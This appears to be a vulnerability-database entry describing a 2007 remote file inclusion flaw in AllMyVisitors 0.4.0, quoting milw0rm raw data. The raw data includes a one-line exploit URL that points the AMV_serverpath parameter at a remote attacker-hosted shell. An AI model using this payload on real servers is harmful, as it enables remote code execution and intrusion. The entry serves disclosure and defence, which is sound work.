header-logo
Suggest Exploit
vendor:
AllMyVisitors
by:
bd0rk
7.5
CVSS
HIGH
File Inclusion
CWE
Product Name: AllMyVisitors
Affected Version From: AllMyVisitors 0.4.0
Affected Version To: AllMyVisitors 0.4.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

AllMyVisitors 0.4.0 File Inclusion Vulnerability

The AllMyVisitors 0.4.0 software is vulnerable to file inclusion. By exploiting this vulnerability, an attacker can execute arbitrary code on the target system.

Mitigation:

Update to a patched version of AllMyVisitors software.
Source

Exploit-DB raw data:

                         AllMyVisitors 0.4.0 File Inclusion Vulnerability



Affected Software: AllMyVisitors 0.4.0

Download: http://www.php-resource.net//modules/AllMyLinks//action/gotolink.php?AML_linkid=11

Vulnerable Code in index.php

Bugfounder: bd0rk

[+]Exploit: http://[target]/[all_my_visitors_path]/index.php?AMV_openconfig=1&AMV_serverpath=http://[Shell]

# milw0rm.com [2007-01-07]

Navigation

Suggest Exploit

Services By CQR